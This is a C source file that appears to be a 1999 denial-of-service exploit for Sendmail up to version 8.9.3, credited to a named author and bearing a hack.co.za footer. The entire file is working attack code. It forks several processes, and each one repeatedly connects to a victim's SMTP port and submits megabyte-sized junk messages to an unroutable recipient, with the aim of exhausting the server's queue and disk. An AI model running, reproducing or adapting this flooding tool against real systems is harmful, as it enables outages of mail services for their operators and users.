/*
  By Michal Szymanski <siwa9@box43.gnet.pl>
  Sendmail DoS (up to 8.9.3);
  Sat Apr  3 00:12:31 CEST 1999
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

#undef VERBOSE          /* define it, if MORECONN is undefined */

#define MORECONN

// #define RCPT_TO      "foo@ftp.onet.pl"

#define RCPT_TO "foo@10.255.255.255"

#ifdef MORECONN
#define MAXCONN 5
#endif

#define BSIZE   1048576         /* df* control file size */
#define PORT    25

char buffer[BSIZE];
int sockfd,x,loop,chpid;

void usage(char *fname)
{
  fprintf(stderr,"Usage: %s <victim_host>\n",fname);
  exit(1);
}

void say(char *what)
{

  if (write(sockfd,what,strlen(what))<0)
    {
      perror("write()");
      exit(errno);
    }

#ifdef VERBOSE
  fprintf(stderr,"<%s",what);
#endif

  bzero(buffer,BSIZE);

  usleep(1000);

  if (read(sockfd,buffer,BSIZE)<0)
    {
      perror("read()");
      exit(errno);
    }

#ifdef VERBOSE
  fprintf(stderr,buffer);
#endif
}


int main(int argc,char *argv[])
{
  struct sockaddr_in serv_addr;
  struct hostent *host;
  char *hostname,hostaddr[20];

  fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n");

  if (argc<2) usage(argv[0]);

#ifdef VERBOSE
  fprintf(stderr,">Preparing address. \n");
#endif

  hostname=argv[1];

  serv_addr.sin_port=htons(PORT);
  serv_addr.sin_family=AF_INET;

  if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1)
    {

#ifdef VERBOSE
      fprintf(stderr,">Getting info from DNS.\n");
#endif

      if ((host=gethostbyname(hostname))==NULL)
        {
          herror("gethostbyname()");
          exit(h_errno);
        }

      serv_addr.sin_family=host->h_addrtype;

      bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length);

#ifdef VERBOSE
      fprintf(stderr,">Official name of host: %s\n",host->h_name);
#endif

      hostname=host->h_name;

      sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
              (unsigned char)host->h_addr[1],
              (unsigned char)host->h_addr[2],
              (unsigned char)host->h_addr[3]);

    }
  else sprintf(hostaddr,"%s",hostname);

#ifdef MORECONN
  for (;loop<MAXCONN;loop++) if (!(chpid=fork()))
      {
#endif

        for(;;)
          {

            bzero(&(serv_addr.sin_zero),8);

            if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
              {
                perror("socket()");
                exit(errno);
              }

            if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1)
              {
                perror("connect()");
                exit(errno);
              }

#ifdef VERBOSE
            fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
#endif

            bzero(buffer,BSIZE);
            read(sockfd,buffer,BSIZE);
#ifdef VERBOSE
            fprintf(stderr,buffer);
#else
            fprintf(stderr,".");
#endif

            say("helo foo\n");
            say("mail from:root@localhost\n");
            say("rcpt to:" RCPT_TO "\n");
            say("data\n");

            for (x=0;x<=BSIZE;x++) buffer[x]='X';
            write(sockfd,buffer,BSIZE);

            say("\n.\n");
            sleep(1);
            say("quit\n");

            shutdown(sockfd,2);

            close(sockfd);

#ifdef VERBOSE
            fprintf(stderr,">Connection closed succesfully.\n");
#endif
          }
#ifdef MORECONN
      }
  waitpid(chpid,NULL,0);
#endif
  return 0;
}
/*                    www.hack.co.za              [2000]*/